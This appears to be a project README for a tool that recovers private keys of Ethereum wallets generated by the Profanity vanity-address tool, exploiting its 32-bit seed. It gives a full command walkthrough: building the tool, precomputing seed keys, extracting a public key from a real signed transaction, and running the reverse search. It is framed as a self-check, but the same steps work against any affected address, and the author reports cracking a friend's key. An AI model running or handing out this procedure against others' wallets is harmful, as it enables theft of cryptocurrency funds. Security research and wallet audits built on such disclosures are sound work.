Profanity Brute-force

This is a tool to exploit a profanity hack and reconstruct a private key from a wallet that was generated using Profanity. I was able to brute-force my friend’s private key on my MacBook M1 Pro (16 Gb) in 26 minutes.

Profanity

Profanity is an Ethereum vanity address generation tool that allows you to create wallets with fancy addresses. It generates addresses in parallel by exploiting GPU power with OpenCL.

But the problem is that Profanity uses a random 32-bit vector to seed 256-bit private keys, which makes it possible to brute-force private keys for wallets that were generated using the tool.

You can read more about the exploit in this tweet or this blog post.

How to check if your wallet is affected?

First of all, you need a machine with at least 8GB of free GPU memory. You can rent a cloud GPU on vast.ai.

I used my MacBook M1 Pro with 16 Gb of RAM.

As an example, let's find a private key that was generated by profanity and corresponds to the following address 0x000000000f04ed53bffb5061bcc77327cb8661ee.

1. Build the project

$ git clone https://github.com/rebryk/profanity-brute-force
$ cd profanity-brute-force
$ make

2. Compute public keys

Run the following command to precompute all seed public keys into cache directory.

$ mkdir cache
$ ./profanity.x64 -h 

3. Find any signed transaction

You need to have a signed transaction in order to reconstruct a public key. You can find it using Etherscan.

Let's use the most recent transaction with the hash 0xaeb6e4a11e74dcda9ad780655a290797e7a347b60fe9b63d6d790684952b8411 and click on Get Raw Tx Hex to obtain the raw transaction.

Raw Tx Hex: 0x02f87201048459682f0085013d2a27d082520894000000000d1c18a47a23c5826b2567c864a7d414880328ddd5c0dafd7880c001a0c7065b5d54ebcfb3a4325bbd80e0a352500784e2b12cfee614f8ab179ef9cd479fd78e0651f4f408db5420c785204b704ac14de95b18efb913036d9845906da2

4. Reconsutruct the public key

To obtain the public key from the raw transaction, utilize the pubkey.py script.

$ pip install -r requirements.txt
$ python pubkey.py -t 0x02f87201048459682f0085013d2a27d082520894000000000d1c18a47a23c5826b2567c864a7d414880328ddd5c0dafd7880c001a0c7065b5d54ebcfb3a4325bbd80e0a352500784e2b12cfee614f8ab179ef9cd479fd78e0651f4f408db5420c785204b704ac14de95b18efb913036d9845906da2
Pubkey: 0x24bfec77b282d8f45a22e3a9dd6019ae61cd0704b02600aa53e7f3a1e70ec4374fabdea4ac483629ab3021224be6575dbf0ab2cd742ecabb7dc38c228c73a19b

5. Run search

$ ./profanity.x64 --reverse --steps 20000 --cache --target 0x24bfec77b282d8f45a22e3a9dd6019ae61cd0704b02600aa53e7f3a1e70ec4374fabdea4ac483629ab3021224be6575dbf0ab2cd742ecabb7dc38c228c73a19b

6. Results

If the program generates a private key for your address, it indicates a vulnerability. However, if it fails to do so, it does not necessarily indicate that your wallet is safe! You can try running step 5 with additional steps.